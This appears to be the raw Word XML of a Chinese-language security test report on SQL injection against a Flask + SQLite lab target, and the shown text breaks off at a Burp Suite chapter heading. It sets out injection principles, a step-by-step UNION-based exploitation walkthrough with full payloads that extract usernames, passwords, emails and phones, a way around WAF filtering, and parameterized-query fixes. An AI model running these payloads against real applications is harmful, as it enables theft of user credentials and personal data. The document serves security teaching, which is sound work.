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667EEA"/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>SQL 注入漏洞原理、利用与修复</w:t>
        <w:br/>
        <w:t>安全测试报告</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>基于 Flask + SQLite 靶机环境</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>项目地址：https://github.com/simengyu-i/flask-user-manager</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>第一章：SQL 注入原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>1.1 什么是 SQL 注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>SQL 注入（SQL Injection）是一种将恶意的 SQL 代码插入到应用程序的输入参数中，并在后端数据库服务器上执行的攻击方式。攻击者可以利用该漏洞绕过认证、窃取数据、甚至获得数据库服务器的控制权。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>SQL 注入的本质是：应用程序将用户输入的数据直接拼接到 SQL 语句中，而没有对用户输入进行充分的验证或转义，导致用户输入的数据被当作 SQL 代码执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>1.2 注入原理图解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正常执行流程：</w:t>
        <w:br/>
        <w:t xml:space="preserve">  用户输入 "admin"  →  SELECT * FROM users WHERE username = 'admin'</w:t>
        <w:br/>
        <w:t xml:space="preserve">                                                       ↑</w:t>
        <w:br/>
        <w:t xml:space="preserve">                                                作为字符串值使用</w:t>
        <w:br/>
        <w:br/>
        <w:t>注入攻击流程：</w:t>
        <w:br/>
        <w:t xml:space="preserve">  用户输入 "' OR 1=1 --"  →  SELECT * FROM users WHERE username = '' OR 1=1 --'</w:t>
        <w:br/>
        <w:t xml:space="preserve">                                                                ↑         ↑</w:t>
        <w:br/>
        <w:t xml:space="preserve">                                                          闭合引号  永真条件  注释掉后续SQL</w:t>
        <w:br/>
        <w:t xml:space="preserve">  → 返回所有用户数据！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>1.3 漏洞产生的条件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>SQL 注入漏洞的产生需要同时满足以下三个条件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>用户输入可控：</w:t>
      </w:r>
      <w:r>
        <w:t>应用程序接收了用户的输入参数（GET/POST/ Cookie 等）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>未过滤/转义：</w:t>
      </w:r>
      <w:r>
        <w:t>应用程序未对用户输入进行严格的过滤、转义或参数化处理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>字符串拼接：</w:t>
      </w:r>
      <w:r>
        <w:t>应用程序使用字符串拼接的方式构造 SQL 语句</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>1.4 漏洞代码示例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>存在漏洞的代码（本项目中的 /search 路由）：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❌ 存在 SQL 注入漏洞的写法</w:t>
        <w:br/>
        <w:t>keyword = request.args.get("keyword", "")</w:t>
        <w:br/>
        <w:t>sql = f"SELECT * FROM users WHERE username LIKE '%{keyword}%'"</w:t>
        <w:br/>
        <w:t>c.execute(sql)</w:t>
        <w:br/>
        <w:br/>
        <w:t># ✅ 修复后的写法（参数化查询）</w:t>
        <w:br/>
        <w:t>sql = "SELECT * FROM users WHERE username LIKE ?"</w:t>
        <w:br/>
        <w:t>c.execute(sql, (f"%{keyword}%",))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>第二章：SQL 注入分类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分类方式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参数类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>数字型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>参数为数字，无需引号闭合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字符型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>参数为字符串，需要引号闭合</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>响应方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>显式注入（Union Based）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>结果直接回显在页面上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盲注（Boolean/Time Based）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>无直接回显，通过页面变化推断</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>注入位置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>GET/POST/Cookie/Header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>任何用户可控的输入点都可能存在注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>2.1 数字型 vs 字符型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>数字型注入：参数直接拼接到数字字段，无需引号闭合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数字型</w:t>
        <w:br/>
        <w:t>SELECT * FROM products WHERE id = 1</w:t>
        <w:br/>
        <w:t xml:space="preserve">                         UNION SELECT ...</w:t>
        <w:br/>
        <w:t># 注入 payload:  1 UNION SELECT ...</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>字符型注入：参数用引号包裹，需要先闭合引号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字符型</w:t>
        <w:br/>
        <w:t>SELECT * FROM users WHERE username = 'admin'</w:t>
        <w:br/>
        <w:t xml:space="preserve">                                    ' UNION SELECT ...</w:t>
        <w:br/>
        <w:t># 注入 payload:  admin' UNION SELECT ...</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>2.2 判断注入类型的方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>通过做减法运算来判断：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数字型测试</w:t>
        <w:br/>
        <w:t>?id=1     → 正常显示</w:t>
        <w:br/>
        <w:t>?id=2-1   → 如果结果和 id=1 一样，说明是数字型</w:t>
        <w:br/>
        <w:br/>
        <w:t># 字符型测试</w:t>
        <w:br/>
        <w:t>?username=admin     → 正常</w:t>
        <w:br/>
        <w:t>?username=admin'    → 报错或页面异常，说明存在字符型注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>第三章：SQL 注入操作步骤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>第一步：判断是否存在注入点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>在参数中输入特殊字符，观察页面是否出现异常、报错或内容变化：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正常请求</w:t>
        <w:br/>
        <w:t>GET /search?keyword=admin    → 显示正常结果</w:t>
        <w:br/>
        <w:br/>
        <w:t># 测试注入</w:t>
        <w:br/>
        <w:t>GET /search?keyword=admin'   → 页面报错或空白（说明存在注入）</w:t>
        <w:br/>
        <w:t>GET /search?keyword=admin"   → 页面报错</w:t>
        <w:br/>
        <w:t>GET /search?keyword=admin)   → 页面报错</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>第二步：判断闭合方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>对于字符型注入，需要确定 SQL 语句是用什么符号包裹参数的：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常见闭合方式</w:t>
        <w:br/>
        <w:t>'      单引号闭合（最常见）</w:t>
        <w:br/>
        <w:t>"      双引号闭合</w:t>
        <w:br/>
        <w:t>('     单引号加括号</w:t>
        <w:br/>
        <w:t>("     双引号加括号</w:t>
        <w:br/>
        <w:br/>
        <w:t># 测试方法：逐一尝试，直到页面不报错</w:t>
        <w:br/>
        <w:t>' OR '1'='1</w:t>
        <w:br/>
        <w:t>" OR "1"="1</w:t>
        <w:br/>
        <w:t>') OR ('1'='1</w:t>
        <w:br/>
        <w:t>") OR ("1"="1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>第三步：判断查询列数（ORDER BY）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>使用 ORDER BY 探测原查询语句返回的列数：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从 1 开始递增，直到报错</w:t>
        <w:br/>
        <w:t>' ORDER BY 1--   → 正常（至少1列）</w:t>
        <w:br/>
        <w:t>' ORDER BY 2--   → 正常</w:t>
        <w:br/>
        <w:t>' ORDER BY 3--   → 正常</w:t>
        <w:br/>
        <w:t>' ORDER BY 4--   → 正常</w:t>
        <w:br/>
        <w:t>' ORDER BY 5--   → 报错！说明列数为 4</w:t>
        <w:br/>
        <w:br/>
        <w:t># ORDER BY 被 WAF 拦截时的备选方案</w:t>
        <w:br/>
        <w:t>' GROUP BY 1--</w:t>
        <w:br/>
        <w:t>' GROUP BY 2--</w:t>
        <w:br/>
        <w:t># ... 依次递增</w:t>
        <w:br/>
        <w:br/>
        <w:t># 或者直接用 UNION SELECT NULL 试探</w:t>
        <w:br/>
        <w:t>' UNION SELECT NULL--        → 报错（列数不匹配）</w:t>
        <w:br/>
        <w:t>' UNION SELECT NULL,NULL--   → 报错</w:t>
        <w:br/>
        <w:t>' UNION SELECT NULL,NULL,NULL,NULL--   → 正常！列数为4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>第四步：查询回显位置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>确定哪些列的数据会显示在页面上：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' UNION SELECT 1,2,3,4--</w:t>
        <w:br/>
        <w:t># 观察页面显示的数字，确定回显位置</w:t>
        <w:br/>
        <w:t># 如果页面显示"2"和"3"，说明第2、3列是回显位</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>第五步：获取数据库信息（SQLite）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>获取 SQLite 版本：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' UNION SELECT sqlite_version(),2,3,4--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>获取数据库名（SQLite 中数据库名为文件路径）：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' UNION SELECT group_concat(name),2,3,4 FROM pragma_database_list WHERE seq=0--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>注：seq=0 表示主数据库，SQLite 的主数据库序号永远为 0。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>获取所有表名：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' UNION SELECT group_concat(name),2,3,4 FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>获取指定表的列名：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' UNION SELECT group_concat(name),2,3,4 FROM pragma_table_info('users')--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>获取数据：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' UNION SELECT group_concat(id||'~'||username||'~'||password||'~'||email||'~'||phone),2,3,4 FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>避免 NULL 值导致拼接失效：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' UNION SELECT group_concat(coalesce(id,'')||'~'||coalesce(username,'')||'~'||coalesce(password,'')||'~'||coalesce(email,'')||'~'||coalesce(phone,'')),2,3,4 FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>数据量过大时分页提取：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' UNION SELECT id||'~'||username||'~'||password||'~'||email||'~'||phone,2,3,4 FROM users LIMIT 1 OFFSET 0--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>第四章：SQLite 数据库特有说明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SQLite 语句</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>获取版本号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>SELECT sqlite_version();</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>获取数据库文件名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>SELECT name FROM pragma_database_list WHERE seq=0;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>获取所有表名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>SELECT name FROM sqlite_master WHERE type='table';</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>获取表结构</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>SELECT name FROM pragma_table_info('表名');</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>字符串拼接运算符</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>||  （例如：'a'||'~'||'b' = 'a~b'）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC6600"/>
        </w:rPr>
        <w:t>⚠ SQLite 没有 information_schema 数据库！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>与 MySQL 不同，SQLite 使用以下方式获取元数据：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sqlite_master：</w:t>
      </w:r>
      <w:r>
        <w:t>系统表，存储所有数据库对象（表、索引、视图）的元数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>pragma_table_info()：</w:t>
      </w:r>
      <w:r>
        <w:t>函数，返回指定表的列信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>pragma_database_list：</w:t>
      </w:r>
      <w:r>
        <w:t>函数，返回当前连接的所有数据库列表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>第五章：完整注入示例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>以下演示基于本项目的搜索功能（/search?keyword=...），使用 Burp Suite 或 curl 测试。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>5.1 逐步注入过程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>第1步：探测注入点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GET /search?keyword=admin</w:t>
        <w:br/>
        <w:t xml:space="preserve">  正常返回结果</w:t>
        <w:br/>
        <w:br/>
        <w:t>GET /search?keyword=admin'</w:t>
        <w:br/>
        <w:t xml:space="preserve">  页面异常或报错 → 存在注入</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>第2步：确定闭合方式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GET /search?keyword=admin' OR '1'='1</w:t>
        <w:br/>
        <w:t xml:space="preserve">  返回所有用户 → 闭合方式为单引号 '</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>第3步：确定列数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GET /search?keyword=admin' ORDER BY 1--</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ...</w:t>
        <w:br/>
        <w:t>GET /search?keyword=admin' ORDER BY 5--</w:t>
        <w:br/>
        <w:t xml:space="preserve">  报错 → 列数为4</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>第4步：获取 SQLite 版本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GET /search?keyword=admin' UNION SELECT sqlite_version(),2,3,4--</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>第5步：获取表名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GET /search?keyword=admin' UNION SELECT group_concat(name),2,3,4 FROM sqlite_master WHERE type='table'--</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>第6步：获取列名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GET /search?keyword=admin' UNION SELECT group_concat(name),2,3,4 FROM pragma_table_info('users')--</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>第7步：提取数据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GET /search?keyword=admin' UNION SELECT group_concat(id||':'||username||':'||password),2,3,4 FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>5.2 完整注入 payload 示例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>将以下 payload 经过 URL 编码后放入搜索框或直接请求：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原始 payload（未编码）</w:t>
        <w:br/>
        <w:t>' UNION SELECT group_concat(id||'~'||username||'~'||password||'~'||email||'~'||phone),2,3,4 FROM users--</w:t>
        <w:br/>
        <w:br/>
        <w:t># Burp 中直接粘贴原始 payload 即可</w:t>
        <w:br/>
        <w:t># curl 中需用 --data-urlencode 或手动编码特殊字符</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>第六章：修复方案</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>6.1 参数化查询（Prepared Statements）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>这是防御 SQL 注入最有效、最根本的方法。参数化查询将 SQL 语句模板和用户数据分开发送，数据库引擎会把占位符的值严格当作数据处理，不会解析其中的 SQL 关键字。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>修复前（存在漏洞）：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f-string 拼接（漏洞代码）</w:t>
        <w:br/>
        <w:t>keyword = request.args.get("keyword", "")</w:t>
        <w:br/>
        <w:t>sql = f"SELECT id, username, email, phone FROM users WHERE username LIKE '%{keyword}%' OR email LIKE '%{keyword}%'"</w:t>
        <w:br/>
        <w:t>c.execute(sql)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>修复后（安全代码）：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参数化查询（修复代码）</w:t>
        <w:br/>
        <w:t>keyword = request.args.get("keyword", "")</w:t>
        <w:br/>
        <w:t>sql = "SELECT id, username, email, phone FROM users WHERE username LIKE ? OR email LIKE ?"</w:t>
        <w:br/>
        <w:t>c.execute(sql, (f"%{keyword}%", f"%{keyword}%"))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>6.2 注册功能修复对比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❌ 修复前（f-string 拼接）</w:t>
        <w:br/>
        <w:t>sql = f"INSERT INTO users (username, password, email, phone) VALUES ('{username}', '{password}', '{email}', '{phone}')"</w:t>
        <w:br/>
        <w:t>c.execute(sql)</w:t>
        <w:br/>
        <w:br/>
        <w:t># ✅ 修复后（参数化查询）</w:t>
        <w:br/>
        <w:t>sql = "INSERT INTO users (username, password, email, phone) VALUES (?, ?, ?, ?)"</w:t>
        <w:br/>
        <w:t>c.execute(sql, (username, password, email, phone))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>6.3 为什么参数化查询能防御 SQL 注入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对比项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字符串拼接</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>用户输入 ' OR 1=1 -- 被直接拼入 SQL，变成 WHERE username = '' OR 1=1 --，改变原 SQL 语义</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>参数化查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>用户输入即使包含 SQL 关键字，也被当作字符串值处理，不会改变 SQL 结构</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>6.4 其他防御措施</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>最小权限原则：</w:t>
      </w:r>
      <w:r>
        <w:t>数据库连接使用只读或最小权限账号，限制敏感操作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>输入校验：</w:t>
      </w:r>
      <w:r>
        <w:t>补充层面，对输入内容进行白名单校验（如只允许字母数字），但不能替代参数化查询</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>WAF 规则：</w:t>
      </w:r>
      <w:r>
        <w:t>部署 Web 应用防火墙拦截常见的 SQL 注入 payload 模式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>避免错误信息泄露：</w:t>
      </w:r>
      <w:r>
        <w:t>生产环境关闭详细的数据库错误信息输出，防止攻击者获取线索</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>定期安全审计：</w:t>
      </w:r>
      <w:r>
        <w:t>使用 SQLMap 等工具定期扫描应用是否存在注入风险</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>第七章：Burp Suite 实战操作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
